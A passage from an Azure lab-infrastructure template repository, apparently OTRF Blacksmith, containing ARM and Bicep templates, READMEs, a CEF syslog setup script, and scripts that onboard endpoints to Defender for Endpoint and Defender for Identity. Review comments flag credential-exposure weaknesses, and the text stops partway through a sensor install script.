13 | {
14 | "type": "http",
15 | "direction": "out",
16 | "name": "Response"
17 | }
18 | ]
19 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/Hello/run.ps1:
--------------------------------------------------------------------------------
using namespace System.Net

# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)

# Write to the Azure Functions log stream.
Write-Host "PowerShell HTTP trigger function processed a request."

# Take the name from the query string first and fall back to the request body.
$name = $Request.Query.Name
if (-not $name) { $name = $Request.Body.Name }

# The caller-supplied name is echoed back verbatim in the response body.
$body = if ($name) {
    "Hello, $name. This HTTP triggered function executed successfully."
} else {
    "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."
}

# Associate values to output bindings by calling 'Push-OutputBinding'.
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = $body
})
26 |
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/Hello/sample.dat:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Azure"
3 | }
4 |
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/host.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "2.0",
3 | "logging": {
4 | "applicationInsights": {
5 | "samplingSettings": {
6 | "isEnabled": true,
7 | "excludedTypes": "Request"
8 | }
9 | }
10 | },
11 | "extensionBundle": {
12 | "id": "Microsoft.Azure.Functions.ExtensionBundle",
13 | "version": "[3.*, 4.0.0)"
14 | },
15 | "managedDependency": {
16 | "enabled": true
17 | }
18 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/profile.ps1:
--------------------------------------------------------------------------------
# Azure Functions profile.ps1
#
# Runs on every "cold start" of the Function App, i.e. when the app starts for the very
# first time or starts again after being de-allocated for inactivity.
#
# Use it for helper functions, one-off commands or environment variables. Plain variables
# defined here do not survive past the first execution; only environment variables persist.

# When the host exposes MSI_SECRET, sign Azure PowerShell in with the managed identity.
# Remove this block if neither MSI nor Azure PowerShell is used.
if (-not [string]::IsNullOrEmpty($env:MSI_SECRET)) {
    Disable-AzContextAutosave -Scope Process | Out-Null
    Connect-AzAccount -Identity
}

# Uncomment the next line to enable legacy AzureRm alias in Azure PowerShell.
# Enable-AzureRmAlias

# You can also define functions or aliases that can be referenced in any of your PowerShell functions.
23 |
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/requirements.psd1:
--------------------------------------------------------------------------------
1 | # This file enables modules to be automatically managed by the Functions service.
2 | # See https://aka.ms/functionsmanageddependency for additional information.
3 | #
4 | @{
5 | # For latest supported version, go to 'https://www.powershellgallery.com/packages/Az'.
6 | # To use the Az module in your function app, please uncomment the line below.
7 | # 'Az' = '9.*'
8 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Key-Vault/README.md:
--------------------------------------------------------------------------------
1 | # Azure Key Vault + Access Policy
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Key-Vault%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Key-Vault%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Key-Vault%2Fazuredeploy.json)
6 |
7 | ## References
8 |
9 | * https://docs.microsoft.com/en-us/azure/key-vault/general/vault-create-template?tabs=CLI
10 | * https://docs.microsoft.com/en-us/azure/templates/microsoft.keyvault/vaults?tabs=json
11 | * https://github.com/Azure/azure-quickstart-templates/tree/master/modules/Microsoft.KeyVault/vaults/1.0
12 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-create
13 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-create-rbac
14 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-secret-create
15 | * https://github.com/Azure/azure-quickstart-templates/tree/master/quickstarts/microsoft.keyvault/key-vault-with-logging-create
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Agents/README.md:
--------------------------------------------------------------------------------
1 | # Azure Monitor Agents
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Data-Collection-Endpoint/README.md:
--------------------------------------------------------------------------------
1 | # Data Collection Endpoint
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FData-Collection-Endpoint%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FData-Collection-Endpoint%2Fazuredeploy.json)
4 |
5 | Data Collection Endpoints (DCEs) allow you to uniquely configure ingestion settings for Azure Monitor.
6 |
7 | ## References:
8 | * https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/data-collection-endpoint-overview
9 | * https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionendpoints?tabs=json
10 | * https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/2021-04-01/datacollectionendpoints?tabs=json
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Data-Collection-Rules/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "ruleName": {
6 | "type": "String",
7 | "metadata": {
8 | "description": "Specifies the name of the data collection rule to create."
9 | }
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Specifies the location in which to create the data collection rule."
15 | },
16 | "defaultValue": "[resourceGroup().location]"
17 | },
18 | "dataSources": {
19 | "type": "Object",
20 | "metadata": {
21 | "description": "The specification of data sources."
22 | }
23 | },
24 | "dataFlows": {
25 | "type": "Array",
26 | "metadata": {
27 | "description": "The specification of data flows."
28 | }
29 | },
30 | "destinations": {
31 | "type": "Object",
32 | "metadata": {
33 | "description": "The specification of destinations."
34 | }
35 | },
36 | "tagsArray": {
37 | "type": "Object",
38 | "defaultValue": {}
39 | }
40 | },
41 | "resources": [
42 | {
43 | "type": "microsoft.insights/dataCollectionRules",
44 | "apiVersion": "2021-04-01",
45 | "name": "[parameters('ruleName')]",
46 | "location": "[parameters('location')]",
47 | "tags": "[parameters('tagsArray')]",
48 | "properties": {
49 | "dataSources": "[parameters('dataSources')]",
50 | "destinations": "[parameters('destinations')]",
51 | "dataFlows": "[parameters('dataFlows')]"
52 | }
53 | }
54 | ],
55 | "outputs": {
56 | "dataCollectionRuleId": {
57 | "type": "String",
58 | "value": "[resourceId('microsoft.insights/dataCollectionRules', parameters('ruleName'))]"
59 | }
60 | }
61 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Monitor-Dependency-Agents/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to install the Azure Monitor Dependency Agent. The format is an array of endpoints with a property/attribute named 'vmName'"
9 | }
10 | },
11 | "location": {
12 | "type": "string",
13 | "defaultValue": "[resourceGroup().location]",
14 | "metadata": {
15 | "description": "Location for all resources."
16 | }
17 | }
18 | },
19 | "variables": {
20 | "DaExtensionVersion": "9.5"
21 | },
22 | "resources": [
23 | {
24 | "name": "[concat(parameters('virtualMachines')[copyIndex('AMDACopy')].vmName,'/', if(equals(parameters('virtualMachines')[copyIndex('AMDACopy')].os, 'windows'), 'DependencyAgentWindows', 'DependencyAgentLinux'))]",
25 | "type": "Microsoft.Compute/virtualMachines/extensions",
26 | "apiVersion": "2020-06-01",
27 | "location": "[parameters('location')]",
28 | "copy": {
29 | "name": "AMDACopy",
30 | "count": "[length(parameters('virtualMachines'))]"
31 | },
32 | "properties": {
33 | "publisher": "Microsoft.Azure.Monitoring.DependencyAgent",
34 | "type": "[if(equals(parameters('virtualMachines')[copyIndex('AMDACopy')].os, 'windows'), 'DependencyAgentWindows', 'DependencyAgentLinux')]",
35 | "typeHandlerVersion": "[variables('DaExtensionVersion')]",
36 | "autoUpgradeMinorVersion": true
37 | }
38 | }
39 | ],
40 | "outputs": {}
41 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Resources-Deployment-Scripts/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "deploymentScriptName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of deployment script resource"
9 | }
10 | },
11 | "identityId": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Id of the managed identity to create Azure AD applications used by cloud katana to expose its API and enable Azure AD authentication and authorization. Format: /subscriptions/SUBSCRIPTIONID/resourcegroups/GROUP/providers/Microsoft.ManagedIdentity/userAssignedIdentities/IDENTITYNAME"
15 | }
16 | },
17 | "utcValue": {
18 | "type": "string",
19 | "defaultValue": "[utcNow()]"
20 | },
21 | "scriptContent": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Script Content"
25 | }
26 | },
27 | "supportingScriptUris": {
28 | "type": "array",
29 | "metadata": {
30 | "description": "Supporting files for the external script."
31 | }
32 | },
33 | "location": {
34 | "type": "string",
35 | "defaultValue": "[resourceGroup().location]",
36 | "metadata": {
37 | "description": "Specifies the Azure location for all resources."
38 | }
39 | }
40 | },
41 | "resources": [
42 | {
43 | "type": "Microsoft.Resources/deploymentScripts",
44 | "apiVersion": "2020-10-01",
45 | "name": "[parameters('deploymentScriptName')]",
46 | "location": "[parameters('location')]",
47 | "identity": {
48 | "type": "UserAssigned",
49 | "userAssignedIdentities": {
50 | "[parameters('identityId')]": {}
51 | }
52 | },
53 | "kind": "AzurePowerShell",
54 | "properties": {
55 | "forceUpdateTag": "[parameters('utcValue')]",
56 | "azPowerShellVersion": "6.2",
57 | "timeout": "PT30M",
58 | "scriptContent": "[parameters('scriptContent')]",
59 | "supportingScriptUris": "[parameters('supportingScriptUris')]",
60 | "cleanupPreference": "OnSuccess",
61 | "retentionInterval": "PT1H"
62 | }
63 | }
64 | ],
65 | "outputs": {}
66 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Static-WebApp/auredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "siteName": {
6 | "defaultValue": "Scurry",
7 | "type": "String"
8 | },
9 | "repositoryUrl": {
10 | "type": "string"
11 | },
12 | "branch": {
13 | "type": "string",
14 | "defaultValue": "main",
15 | "metadata": {
16 | "description": "The target branch in the repository."
17 | }
18 | },
19 | "location": {
20 | "type": "string",
21 | "defaultValue": "[resourceGroup().location]",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "variables": {},
28 | "resources": [
29 | {
30 | "type": "Microsoft.Web/staticSites",
31 | "apiVersion": "2022-03-01",
32 | "name": "[parameters('siteName')]",
33 | "location": "[parameters('location')]",
34 | "sku": {
35 | "name": "Standard",
36 | "tier": "Standard"
37 | },
38 | "properties": {
39 | "repositoryUrl": "[parameters('repositoryUrl')]",
40 | "branch": "[parameters('branch')]",
41 | "stagingEnvironmentPolicy": "Enabled",
42 | "allowConfigFileUpdates": true,
43 | "provider": "DevOps",
44 | "enterpriseGradeCdnStatus": "Disabled"
45 | }
46 | }
47 | ]
48 | }
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/README.md:
--------------------------------------------------------------------------------
1 | # Common Event Format (CEF) Server + Log Analytics Agent for Linux
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCEF-Log-Analytics-Agent%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCEF-Log-Analytics-Agent%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCEF-Log-Analytics-Agent%2Fazuredeploy.json)
6 |
7 |
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the VM to run scripts on"
9 | }
10 | },
11 | "extensionName": {
12 | "type": "string"
13 | },
14 | "fileUris": {
15 | "type": "array"
16 | },
17 | "commandToExecute": {
18 | "type": "string"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2019-03-01",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Azure.Extensions",
35 | "type": "CustomScript",
36 | "typeHandlerVersion": "2.1",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {},
39 | "protectedSettings": {
40 | "commandToExecute": "[parameters('commandToExecute')]",
41 | "fileUris": "[parameters('fileUris')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/scripts/Set-Up-CEF.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
# *********** log tagging variables ***********
INFO_TAG="[INSTALLATION-INFO]"     # informational prefix; not referenced anywhere in this script
ERROR_TAG="[INSTALLATION-ERROR]"   # prefix used for the "No options specified" error below

# *********** Set Log File ***************
# NOTE(review): LOGFILE is assigned but never read in this script; all output goes to
# stdout/stderr of the calling shell.
LOGFILE="/var/log/FW-SETUP.log"
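echoerror() {
    # Print " * ERROR: <message>" to stderr. The message is passed as a %s argument rather
    # than spliced into the format string, so a '%' in it is printed literally instead of
    # being parsed as a printf directive. ${RC}/${EC} are not set anywhere in this script
    # and expand to nothing. (Defined but not called by the script itself.)
    printf "${RC} * ERROR${EC}: %s\n" "$*" 1>&2
}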
15 |
16 | # *********** helk function ***************
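usage(){
    # Print the command-line help and exit with status 1 (used for -h, for an invalid
    # option and when no option was given). All of the text goes to stderr; previously
    # only the "Usage:" line did and the rest went to stdout, which mixed help text into
    # anything capturing the script's standard output.
    cat >&2 <<EOF

Usage: $0 [option...]

 -w Azure Sentinel Workspace ID
 -k Azure Sentinel Workspace Key

Examples:
 $0 -w xxxxx -k xxxxxx

EOF
    exit 1
}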
29 |
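# ************ Command Options **********************
while getopts w:k:h option
do
    case "${option}"
    in
        w) WORKSPACE_ID=$OPTARG;;
        k) WORKSPACE_KEY=$OPTARG;;
        h) usage;;
        \?) usage;;
        : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;;
        * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
    esac
done

if ((OPTIND == 1))
then
    echo "$ERROR_TAG No options specified"
    usage
fi

# Both values are consumed by cef_installer.py as positional arguments; fail here instead
# of launching it with one of them missing (previously -w alone silently shifted the key
# position).
if [ -z "${WORKSPACE_ID}" ] || [ -z "${WORKSPACE_KEY}" ]
then
    echo "$ERROR_TAG Both -w <workspace id> and -k <workspace key> are required" >&2
    usage
fi

#######################
# SYSLOG SERVER SETUP #
#######################
# The helper scripts are resolved relative to the current working directory.
# NOTE: the workspace key is handed to the installer on its command line, so it is visible
# in the process list and in this host's shell history while the installer runs.
python3 cef_installer.py "$WORKSPACE_ID" "$WORKSPACE_KEY"
sleep 15

###########################
# SEND SAMPLE CEF MESSAGE #
###########################
#apt-get update -qq
#apt-get install -qqy python3-pip
#python3 -m pip install python-dateutil
python3 cef_simulator.py --debug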
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/scripts/cef_replace.yaml:
--------------------------------------------------------------------------------
1 | SRCTESTIP: 1.2.3.4
2 | DSTTESTIP: 10.0.0.1
--------------------------------------------------------------------------------
/templates/azure/Linux-C2/README.md:
--------------------------------------------------------------------------------
1 | # Command and Control Server
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-C2%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-C2%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Linux-Drupal/README.md:
--------------------------------------------------------------------------------
1 | # Drupal Server
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-Drupal%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-Drupal%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Linux/README.md:
--------------------------------------------------------------------------------
1 | # Linux Virtual Machines (Ubuntu, Red Hat & CentOS)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux%2Fazuredeploy.json)
6 |
7 |
--------------------------------------------------------------------------------
/templates/azure/Linux/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints on which to run the CustomScript extension. The format is an array of objects, each with a 'vmName' and an 'extensionName' property."
9 | }
10 | },
11 | "fileUris": {
12 | "type": "array"
13 | },
14 | "commandToExecute": {
15 | "type": "string"
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | }
22 | }
23 | },
24 | "resources": [
25 | {
26 | "name": "[concat(parameters('virtualMachines')[copyIndex('customScriptCopy')].vmName,'/',parameters('virtualMachines')[copyIndex('customScriptCopy')].extensionName)]",
27 | "type": "Microsoft.Compute/virtualMachines/extensions",
28 | "apiVersion": "2019-03-01",
29 | "location": "[parameters('location')]",
30 | "copy": {
31 | "name": "customScriptCopy",
32 | "count": "[length(parameters('virtualMachines'))]"
33 | },
34 | "properties": {
35 | "publisher": "Microsoft.Azure.Extensions",
36 | "type": "CustomScript",
37 | "typeHandlerVersion": "2.1",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {},
40 | "protectedSettings": {
41 | "commandToExecute": "[parameters('commandToExecute')]",
42 | "fileUris": "[parameters('fileUris')]"
43 | }
44 | }
45 | }
46 | ]
47 | }
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace-Sentinel/README.md:
--------------------------------------------------------------------------------
1 | # Log Analytics Workspace + Azure Sentinel
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Sentinel%2Fmain.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Sentinel%2Fmain.json)
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace-Solutions/README.md:
--------------------------------------------------------------------------------
1 | # Log Analytics Workspace Solutions
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Solutions%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Solutions%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace-Solutions/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "location": {
6 | "type": "string",
7 | "defaultValue": "[resourceGroup().location]",
8 | "metadata": {
9 | "description": "Location for all resources."
10 | }
11 | },
12 | "resourcegroupName": {
13 | "defaultValue": "",
14 | "type": "String"
15 | },
16 | "subscriptionId": {
17 | "defaultValue": "",
18 | "type": "String"
19 | },
20 | "workspaceName": {
21 | "defaultValue": "",
22 | "type": "String"
23 | },
24 | "solutionTypes": {
25 | "defaultValue": [],
26 | "type": "Array"
27 | }
28 | },
29 | "resources": [
30 | {
31 | "type": "Microsoft.OperationsManagement/solutions",
32 | "apiVersion": "2015-11-01-preview",
33 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]",
34 | "location": "[parameters('location')]",
35 | "plan": {
36 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]",
37 | "product": "[Concat('OMSGallery/', parameters('solutionTypes')[copyIndex()])]",
38 | "promotionCode": "",
39 | "publisher": "Microsoft"
40 | },
41 | "properties": {
42 | "workspaceResourceId": "[Concat('/subscriptions/', parameters('subscriptionId'), '/resourceGroups/', parameters('resourcegroupName'), '/providers/Microsoft.OperationalInsights/workspaces/', parameters('workspaceName'))]"
43 | },
44 | "id": "[Concat('/subscriptions/', parameters('subscriptionId'), '/resourceGroups/', parameters('resourcegroupName'), '/providers/Microsoft.OperationsManagement/solutions/', parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]",
45 | "copy": {
46 | "name": "solutionsCopy",
47 | "count": "[length(parameters('solutionTypes'))]"
48 | }
49 | }
50 | ]
51 | }
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace/README.md:
--------------------------------------------------------------------------------
1 | # Log Analytics Workspace
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace/main.bicep:
--------------------------------------------------------------------------------
// Log Analytics workspace whose name is derived from the resource group id and
// the deployment timestamp. Emits the workspace name, its customer (workspace)
// id and its primary shared key for downstream templates.
//
// NOTE(review): this file uses the early Bicep `param x type { ... }` block
// syntax rather than decorators (@description, @allowed, @minValue, ...);
// confirm the Bicep version in use still accepts it.

// Deployment timestamp; used only as entropy for the workspace name below.
param utcValue string {
  metadata: {
    description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
  }
  default: utcNow()
}
// Base name; the deployed resource name is 'log-' + this + a hash suffix.
param workspaceName string {
  metadata: {
    description: 'Name for the Log Analytics workspace used to aggregate data'
  }
}
param pricingTier string {
  allowed: [
    'PerGB2018'
    'Free'
    'Standalone'
    'PerNode'
    'Standard'
    'Premium'
  ]
  metadata: {
    description: 'Pricing tier: pergb2018 or legacy tiers (Free, Standalone, PerNode, Standard or Premium) which are not available to all customers.'
  }
  default: 'PerGB2018'
}
// Retention window in days; the bounds match the Free-tier minimum (7) and
// the maximum stated in the description (730).
param dataRetention int {
  minValue: 7
  maxValue: 730
  metadata: {
    description: 'Number of days of retention. Workspaces in the legacy Free pricing tier can only have 7 days.'
  }
  default: 30
}
// Defaults to true: older data is purged immediately when retention is set
// to 30 days (see the description) — a destructive default for an existing workspace.
param immediatePurgeDataOn30Days bool {
  metadata: {
    description: 'If set to true when changing retention to 30 days, older data will be immediately deleted. Use this with extreme caution. This only applies when retention is being set to 30 days.'
  }
  default: true
}
param location string {
  metadata: {
    description: 'Location for all resources.'
  }
  default: resourceGroup().location
}

// 'log-<workspaceName><hash>'. Because utcValue defaults to utcNow(), the hash
// presumably changes on every deployment, so redeploying this template creates
// a new workspace rather than updating the previous one — TODO confirm that is
// intended (pass a fixed utcValue to get a stable name).
var uniqueWorkspace_var = 'log-${workspaceName}${uniqueString(resourceGroup().id, utcValue)}'

resource uniqueWorkspace 'Microsoft.OperationalInsights/workspaces@2020-08-01' = {
  name: uniqueWorkspace_var
  location: location
  properties: {
    retentionInDays: dataRetention
    features: {
      immediatePurgeDataOn30Days: immediatePurgeDataOn30Days
    }
    sku: {
      name: pricingTier
    }
  }
}

output workspaceName_output string = uniqueWorkspace_var
// customerId is the workspace id that agents use to identify the workspace.
output workspaceIdOutput string = reference(uniqueWorkspace.id, '2020-08-01').customerId
// NOTE(review): primarySharedKey is emitted as a plain string output. ARM
// deployment outputs are generally retained in the deployment history and are
// readable by anyone with read access to the resource group, so this output
// exposes the agent key; confirm downstream templates really need it.
output workspaceKeyOutput string = listKeys(uniqueWorkspace.id, '2015-11-01-preview').primarySharedKey
--------------------------------------------------------------------------------
/templates/azure/Onboard-Endpoints-MDE/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to onboard to Microsoft Defender for Endpoint. Array must have \"vmName\" and \"extensionName\""
9 | }
10 | },
11 | "_mdePackageBlobSasUrl": {
12 | "type": "securestring",
13 | "metadata": {
14 | "description": "Blob SAS URL for the Microsoft Defender for Endpoint onboarding package (zip file). Note: this template places the value in the extension's 'settings' rather than 'protectedSettings', so it is stored unencrypted and returned when the extension resource is read."
15 | }
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | },
22 | "defaultValue": "[resourceGroup().location]"
23 | }
24 | },
25 | "variables": {},
26 | "resources": [
27 | {
28 | "name": "[concat(parameters('virtualMachines')[copyIndex('MDEOnboardCopy')].vmName, '/', parameters('virtualMachines')[copyIndex('MDEOnboardCopy')].extensionName)]",
29 | "type": "Microsoft.Compute/virtualMachines/extensions",
30 | "apiVersion": "2019-12-01",
31 | "location": "[parameters('location')]",
32 | "copy": {
33 | "name": "MDEOnboardCopy",
34 | "count": "[length(parameters('virtualMachines'))]"
35 | },
36 | "properties": {
37 | "publisher": "Microsoft.Compute",
38 | "type": "CustomScriptExtension",
39 | "typeHandlerVersion": "1.10",
40 | "autoUpgradeMinorVersion": true,
41 | "settings": {
42 | "fileUris": ["[parameters('_mdePackageBlobSasUrl')]"],
43 | "commandToExecute": "powershell -ExecutionPolicy Unrestricted -command \"Expand-Archive -path WindowsDefenderATPOnboardingPackage.zip -DestinationPath WindowsDefenderATPOnboardingPackage; echo Y| cmd.exe /c 'WindowsDefenderATPOnboardingPackage\\WindowsDefenderATPLocalOnboardingScript.cmd'\""
44 | },
45 | "protectedSettings": {}
46 | }
47 | }
48 | ],
49 | "outputs": {}
50 | }
--------------------------------------------------------------------------------
/templates/azure/Onboard-Endpoints-MDI/scripts/Install-Sensor.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
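[CmdletBinding()]
Param(
    # MDI sensor access key for the tenant; forwarded to the installer.
    [Parameter(Mandatory=$true)]
    [string] $AccessKey
)

# Fail fast: with the default 'Continue', a missing or corrupt zip would only
# surface as a later Start-Process failure against a path that does not exist.
$ErrorActionPreference = 'Stop'

# Unpack the sensor installer next to this script.
Expand-Archive -path "Azure ATP Sensor Setup.zip" -DestinationPath "Azure ATP Sensor Setup"

# NOTE: AccessKey is passed on the installer's command line, so it is visible
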